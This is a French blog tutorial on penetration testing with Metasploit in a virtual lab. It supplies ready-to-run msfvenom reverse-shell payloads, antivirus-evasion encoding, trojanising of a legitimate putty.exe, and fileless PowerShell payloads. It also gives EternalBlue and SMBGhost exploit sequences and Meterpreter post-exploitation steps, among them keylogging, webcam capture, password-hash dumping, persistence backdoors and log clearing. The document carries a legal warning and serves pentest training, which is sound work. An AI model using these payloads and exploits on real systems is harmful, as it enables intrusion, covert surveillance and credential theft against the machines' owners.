Tests de Pénétration avec Metasploit Framework

🎯 Tests de Pénétration avec Metasploit Framework

📋 Objectif

Temps nécessaire : 2-3 heures
Niveau : Intermédiaire

À la fin de ce guide, vous saurez :

• Créer des payloads avec Msfvenom
• Configurer des listeners Metasploit
• Exploiter des vulnérabilités SMB (EternalBlue, SMBGhost)
• Gérer des sessions Meterpreter pour la post-exploitation
• Diagnostiquer et résoudre les problèmes courants

Avertissement Légal

Ces techniques sont destinées uniquement à des fins éducatives dans des environnements de test contrôlés. L’utilisation contre des systèmes sans autorisation est illégale.

🔧 Prérequis

Système requis

• Kali Linux (machine virtuelle ou physique) - 20 GB espace disque
• Windows 10 en machine virtuelle - 40 GB espace disque
• VirtualBox ou VMware pour virtualisation
• 8 GB RAM minimum (4 GB par VM)
• Réseau configuré : Host-Only ou NAT Network

Connaissances préalables

• Bases de Linux et ligne de commande
• Compréhension des réseaux TCP/IP
• Notions de sécurité informatique
• Utilisation de machines virtuelles

Logiciels à installer

# Sur Kali Linux (généralement préinstallés)
sudo apt update
sudo apt install metasploit-framework nmap netcat-traditional -y

📚 Définition et Contexte

Qu’est-ce que Metasploit ?

Metasploit Framework est une plateforme open-source de test d’intrusion qui permet aux professionnels de la sécurité de découvrir, exploiter et valider des vulnérabilités. C’est l’outil le plus utilisé au monde pour le pentesting.

Analogie simple : Imaginez Metasploit comme un couteau suisse de la cybersécurité - il contient tous les outils nécessaires pour tester la solidité d’un système, mais doit être utilisé de manière éthique et légale.

Histoire rapide

• 2003 : Création par HD Moore
• 2009 : Rachat par Rapid7
• Aujourd’hui : Plus de 2000 exploits, utilisé par les pentesters du monde entier

Composants Principaux

Composant	Description
msfconsole	Interface principale interactive
msfvenom	Générateur de payloads
Exploits	Code qui exploite une vulnérabilité
Payloads	Code exécuté après exploitation
Meterpreter	Shell avancé post-exploitation

Utilisations professionnelles

Domaine	Application
Red Team	Simulation d’attaques réalistes
Pentest	Audit de sécurité d’entreprises
Bug Bounty	Découverte de vulnérabilités
Formation	Apprentissage de la cybersécurité
R&D Sécurité	Développement de protections

🚀 Installation et Configuration

1. Préparation de l’environnement virtuel

# Vérifiez la version de Metasploit
msfconsole --version

# Mettez à jour Metasploit
sudo apt update
sudo apt install metasploit-framework -y
msfupdate

2. Configuration réseau des VMs

Configuration Réseau Recommandée

Utilisez le mode NAT Network dans VirtualBox pour isoler vos VMs du réseau physique tout en leur permettant de communiquer entre elles.

Dans VirtualBox :

1. Fichier → Préférences → Réseau → NAT Networks
2. Créez un nouveau réseau : 10.0.2.0/24
3. Pour chaque VM : Configuration → Réseau → Mode d’accès réseau → Réseau NAT

Vérification :

# Sur Kali Linux
ip addr show

# Sur Windows (PowerShell)
ipconfig

3. Désactivation des protections (pour tests)

Sur Windows 10 :

# Désactiver Windows Defender temporairement
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# Désactiver la protection en temps réel
Set-MpPreference -DisableRealtimeMonitoring $true

Sur Kali Linux :

# Désactiver le pare-feu si actif
sudo ufw disable

# Ou autoriser le port spécifique
sudo ufw allow 4444/tcp

4. Vérification de la connectivité

# Depuis Kali, testez la connexion vers Windows
ping [IP_WINDOWS]

# Testez le port SMB
nmap -p 445 [IP_WINDOWS]

💻 Création de Payloads avec Msfvenom

Msfvenom est l’outil de génération de payloads standalone de Metasploit. Il remplace les anciens outils msfpayload et msfencode.

Syntaxe de Base

msfvenom -p [PAYLOAD] LHOST=[IP_KALI] LPORT=[PORT] -f [FORMAT] -o [FICHIER]

Payload Simple (Reverse TCP)

# Exemple concret : Reverse TCP Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 \
  LPORT=4444 \
  -f exe \
  -o payload_simple.exe

Explication

• windows/meterpreter/reverse_tcp : La cible (Windows) se connecte à l’attaquant
• LHOST : IP de votre machine Kali (attaquant)
• LPORT : Port d’écoute (4444 par défaut)
• -f exe : Format Windows exécutable

Payload avec Encodage

# Encodage pour éviter la détection basique
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 \
  LPORT=4444 \
  -e x86/shikata_ga_nai \
  -i 10 \
  -f exe \
  -o payload_encoded.exe

Options d’encodage

• -e : Type d’encodeur (shikata_ga_nai est polymorphique)
• -i : Nombre d’itérations (plus = plus difficile à détecter)

Types de Payloads Courants

Type	Description	Usage
reverse_tcp	Cible se connecte à l’attaquant	Contourne pare-feu sortant
bind_tcp	Attaquant se connecte à la cible	Nécessite port ouvert
reverse_https	Connexion cryptée HTTPS	Discret dans trafic web
meterpreter	Shell avancé	Post-exploitation complète

Formats de Sortie

# Windows
-f exe          # Exécutable standard
-f dll          # Bibliothèque dynamique
-f msi          # Installeur Windows

# Linux
-f elf          # Exécutable Linux

# Scripts
-f python       # Script Python
-f powershell   # Script PowerShell
-f vbs          # Visual Basic Script

# Web
-f aspx         # Page ASP.NET
-f war          # Application Java (Tomcat)

🎧 Configuration du Listener Metasploit

Le listener attend la connexion du payload exécuté sur la cible.

Configuration manuelle

# Lancer Metasploit
msfconsole

# Configurer le handler
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.108        # IP de votre Kali
set LPORT 4444                  # Port d'écoute
set ExitOnSession false         # Ne pas fermer après une session
exploit -j                      # Lancer en arrière-plan (-j = job)

Configuration automatique avec fichier .rc

# Créer votre propre fichier handler.rc
cat > handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.108
set LPORT 4444
set ExitOnSession false
exploit -j
EOF

# Lancer avec le fichier
msfconsole -r handler.rc

Vérification du listener

# Lister les jobs actifs
msf > jobs

# Vérifier que le port écoute
netstat -tlnp | grep 4444

Astuce Pro

Utilisez plusieurs ports (4444, 5555, 8080) si vous testez plusieurs payloads simultanément.

🔓 Exploitation de Vulnérabilités

Scénario 1 : Exploitation avec Payload Manuel

Étape 1 : Préparer le listener

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.108
set LPORT 4444
exploit -j

Étape 2 : Transférer le payload vers Windows

# Sur Kali, créer un serveur HTTP
cd /chemin/vers/payload
python3 -m http.server 8000

# Sur Windows, ouvrir un navigateur
# http://[IP_KALI]:8000
# Télécharger et exécuter le .exe

Étape 3 : Connexion établie

# Sur Kali, vous verrez :
[*] Sending stage (188998 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened

Scénario 2 : Exploitation EternalBlue (MS17-010)

Prérequis : Activer SMBv1 sur Windows

# Sur Windows 10 (PowerShell Admin)
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Restart-Computer

Exploitation depuis Kali :

# Scanner la vulnérabilité
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.107
run

# Si vulnérable, exploiter
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.107
set LHOST 192.168.1.108
set payload windows/x64/meterpreter/reverse_tcp
exploit

Scénario 3 : Exploitation SMBGhost (CVE-2020-0796)

Vulnérabilité : Windows 10 v1903/1909 non patché

# Scanner la cible
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.107
run

# Exploiter SMBGhost
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS 192.168.1.107
set LHOST 192.168.1.108
set LPORT 5555
set DefangedMode false          # Désactiver le mode sécurisé
exploit

Attention Crash

SMBGhost peut faire crasher Windows (écran bleu). Prenez un snapshot de votre VM avant de tester !

🕹️ Utilisation de Meterpreter

Une fois la session obtenue, interagissez avec la cible :

# Lister les sessions
sessions -l

# Se connecter à la session 1
sessions -i 1

# Commandes de reconnaissance
meterpreter > sysinfo              # Informations système
meterpreter > getuid               # Utilisateur actuel
meterpreter > pwd                  # Répertoire actuel
meterpreter > ps                   # Liste des processus

# Commandes d'interaction
meterpreter > shell                # Shell Windows classique
meterpreter > screenshot           # Capture d'écran
meterpreter > webcam_snap          # Photo webcam
meterpreter > keyscan_start        # Démarrer le keylogger
meterpreter > keyscan_dump         # Afficher les frappes enregistrées

# Gestion de fichiers
meterpreter > ls                   # Lister les fichiers
meterpreter > cd C:\\Users         # Changer de répertoire
meterpreter > download fichier.txt # Télécharger un fichier
meterpreter > upload exploit.exe C:\\Temp  # Uploader un fichier

# Élévation de privilèges
meterpreter > getsystem            # Tenter SYSTEM
meterpreter > hashdump             # Extraire les hash (admin requis)

# Persistence
meterpreter > run persistence -X   # Créer une backdoor persistante

# Migration de processus (pour stabilité)
meterpreter > migrate [PID]        # Migrer vers un processus légitime

Tableau des Commandes Essentielles

Commande	Description	Privilèges requis
sysinfo	Informations système	User
getuid	Utilisateur actuel	User
shell	Shell Windows	User
screenshot	Capture d’écran	User
hashdump	Hash des mots de passe	Admin
getsystem	Élévation SYSTEM	Admin
migrate	Changer de processus	Variable
clearev	Effacer les logs	Admin

🎨 Techniques d’Encodage Avancées

Pourquoi Encoder ?

L’encodage modifie la signature du payload pour éviter la détection par les antivirus. Ce n’est pas du chiffrement, mais de l’obfuscation.

Encodeurs Disponibles

# Lister tous les encodeurs
msfvenom --list encoders

# Encodeurs populaires
x86/shikata_ga_nai      # Polymorphique (change à chaque génération)
x86/call4_dword_xor     # XOR simple
cmd/powershell_base64   # Base64 pour PowerShell

Encodage Multiple

# Shikata Ga Nai avec 15 itérations
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -e x86/shikata_ga_nai -i 15 \
  -f exe -o payload_shikata.exe

# Encodage avec plusieurs encodeurs successifs
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -e x86/call4_dword_xor -i 3 \
  -f exe -o payload_multi.exe

Injection dans Binaire Légitime (Template)

# Injecter dans un exécutable légitime
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -x putty.exe \
  -k \
  -f exe -o putty_backdoor.exe

Options d’injection

• -x : Template (exécutable légitime à utiliser comme base)
• -k : Keep (préserver le fonctionnement original de l’application)

Limitation

Cette technique est détectée par la plupart des antivirus modernes, mais reste utile pour comprendre le concept.

Payloads Sans Fichier (Fileless)

# Payload PowerShell (pas de fichier .exe sur disque)
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -f psh -o payload.ps1

# Payload Python (multiplateforme)
msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -f raw -o payload.py

Commandes de Recherche Utiles

# Rechercher des payloads spécifiques
msfvenom --list payloads | grep windows
msfvenom --list payloads | grep meterpreter
msfvenom --list payloads | grep reverse

# Rechercher des formats
msfvenom --list formats

⚠️ Problèmes Courants et Solutions

1. Payload détecté par Windows Defender

Symptôme : Windows affiche “Virus détecté” et bloque le fichier.

Solutions :

# Solution A : Désactiver Windows Defender (temporaire - tests seulement)
Set-MpPreference -DisableRealtimeMonitoring $true

# Solution B : Ajouter une exclusion pour le dossier
Add-MpPreference -ExclusionPath "C:\Users\[User]\Downloads"

Alternative

Utilisez des techniques d’encodage avancées ou des payloads fileless (PowerShell, Python) qui sont moins détectés.

2. Handler failed to bind (port déjà utilisé)

Symptôme : Rex::BindFailed The address is already in use (0.0.0.0:4444)

Solution :

# Lister et tuer les anciens jobs
msf > jobs -l
msf > jobs -K

# Ou utiliser un autre port
msf > set LPORT 5555

# Vérifier quel processus utilise le port
netstat -tlnp | grep 4444
kill [PID]

3. Connexion SYN_SENT (pas de réponse)

Symptôme : Sur Windows, netstat montre SYN_SENT vers Kali.

Causes : Pare-feu Kali bloque le port entrant.

Solution :

# Vérifier le pare-feu
sudo ufw status

# Autoriser le port
sudo ufw allow 4444/tcp

# Ou avec iptables
sudo iptables -I INPUT -p tcp --dport 4444 -j ACCEPT

# Désactiver complètement (temporaire)
sudo ufw disable

4. Permissions Denied sur /var/lib

Symptôme : Permission denied lors de l’écriture de fichiers

Solution :

# Vérifier les permissions
ls -la /var/lib/metasploit/

# Corriger si nécessaire
sudo chown -R $(whoami) /var/lib/metasploit/

5. Exploit échoue “Failed to find the low stub” (SMBGhost)

Symptôme : SMBGhost ne trouve pas le stub mémoire.

Causes :

• Windows est patché (KB4551762)
• Version incompatible

Solution :

# Vérifier si le patch est installé
Get-HotFix -Id KB4551762

# Si présent, essayez EternalBlue à la place
# Ou désinstallez le patch (non recommandé en production)

📖 Ressources et Documentation

Documentation Officielle

• Metasploit Unleashed - Cours gratuit complet par Offensive Security
• Metasploit Documentation - Documentation officielle Rapid7
• Rapid7 Blog - Actualités et tutoriels

Outils Complémentaires

Outil	Description	Commande
Nmap	Scanner de ports/vulnérabilités	nmap -sV -p- [IP]
Netcat	Communication réseau brute	nc -lvnp 4444
Wireshark	Analyse de trafic réseau	Interface graphique
Searchsploit	Recherche d’exploits offline	searchsploit windows smb

Bases de Données d’Exploits

• Exploit-DB - Plus grande base d’exploits
• CVE Details - Détails des vulnérabilités
• MITRE ATT&CK - Framework de tactiques d’attaque

Plateformes de Formation

• HackTheBox - Machines virtuelles vulnérables
• TryHackMe - Labs guidés pour débutants
• PentesterLab - Exercices de pentesting web
• VulnHub - VMs téléchargeables gratuitement

✅ Checklist Finale

Avant de commencer un test

• VMs isolées sur réseau privé (pas de connexion Internet)
• Snapshots des VMs créés (pour restauration rapide)
• Autorisation écrite obtenue (si non personnel)
• Metasploit à jour (msfupdate)
• Connectivité réseau vérifiée (ping entre VMs)

Pendant le test

• Listener configuré et actif
• Payload généré avec bons paramètres (LHOST/LPORT)
• Pare-feu désactivés sur les deux machines
• Logs des commandes exécutées
• Notes prises sur les vulnérabilités trouvées

Après le test

• Sessions Meterpreter fermées proprement
• Payloads supprimés de la cible
• Protections réactivées (antivirus, pare-feu)
• Rapport de test rédigé
• VMs restaurées aux snapshots propres

💡 Conseils Professionnels

Bonnes Pratiques de Pentesting

1. Toujours documenter : Prenez des notes détaillées de chaque commande et résultat
2. Tester en production miroir : Jamais directement sur le système de production
3. Communiquer avec le client : Informez avant de lancer des exploits risqués
4. Respecter le scope : Ne dépassez pas les limites définies dans le contrat
5. Sécuriser vos outils : Chiffrez vos disques durs contenant des exploits

Astuces de Génération Efficace

# Générer rapidement plusieurs payloads avec différents ports
for port in 4444 5555 6666; do
  msfvenom -p windows/meterpreter/reverse_tcp \
    LHOST=192.168.1.108 LPORT=$port \
    -f exe -o payload_$port.exe
done

# Créer un payload avec timestamp dans le nom
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.108 LPORT=4444 \
  -f exe -o payload_$(date +%Y%m%d_%H%M%S).exe

Optimisation des Sessions

# Migrer vers un processus stable (évite déconnexion)
meterpreter > ps | grep explorer.exe
meterpreter > migrate [PID_explorer]

# Activer l'auto-migration
meterpreter > run post/windows/manage/migrate

# Dump automatique de tous les hash
meterpreter > run post/windows/gather/hashdump

Gestion de Multiples Sessions

# Lister toutes les sessions
sessions -l

# Exécuter une commande sur toutes les sessions
sessions -c "sysinfo"

# Interagir avec plusieurs sessions via scripts
sessions -s script.rc

🎓 Récapitulatif

Ce que vous avez appris

1. Générer des payloads avec Msfvenom (simple et encodé)
2. Configurer des listeners Metasploit pour recevoir les connexions
3. Exploiter des vulnérabilités SMB (EternalBlue, SMBGhost)
4. Utiliser Meterpreter pour la post-exploitation complète
5. Diagnostiquer les erreurs courantes (pare-feu, ports, permissions)
6. Techniques d’encodage pour améliorer la furtivité

Architecture d’une Attaque Metasploit

┌─────────────┐         ┌──────────────┐         ┌─────────────┐
│  Msfvenom   │────────>│   Payload    │────────>│   Victime   │
│  Générateur │         │  (reverse)   │         │   Exécute   │
└─────────────┘         └──────────────┘         └─────────────┘
                                                         │
                                                         │ Connexion
                                                         ▼
┌─────────────┐         ┌──────────────┐         ┌─────────────┐
│ Meterpreter │<────────│   Handler    │<────────│  Payload    │
│   Shell     │         │   (Écoute)   │         │   Actif     │
└─────────────┘         └──────────────┘         └─────────────┘

Commandes Essentielles à Retenir

# Génération
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f exe -o payload.exe

# Écoute
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP]
exploit

# Post-exploitation
sessions -i 1
sysinfo
shell

Conseil Final

La sécurité offensive est un apprentissage continu. Pratiquez régulièrement, restez à jour sur les nouvelles vulnérabilités (CVE), et partagez vos connaissances avec la communauté !

---

📢 Partagez cet article

LinkedIn Twitter Facebook WhatsApp

---

À propos de l'auteur

Riyad ODJOUADEExpert en cybersécurité & infrastructure

Je partage des guides techniques pratiques sur la cybersécurité, l'administration système et le développement web. Tous les contenus sont basés sur des expérimentations réelles.

LinkedIn GitHub Email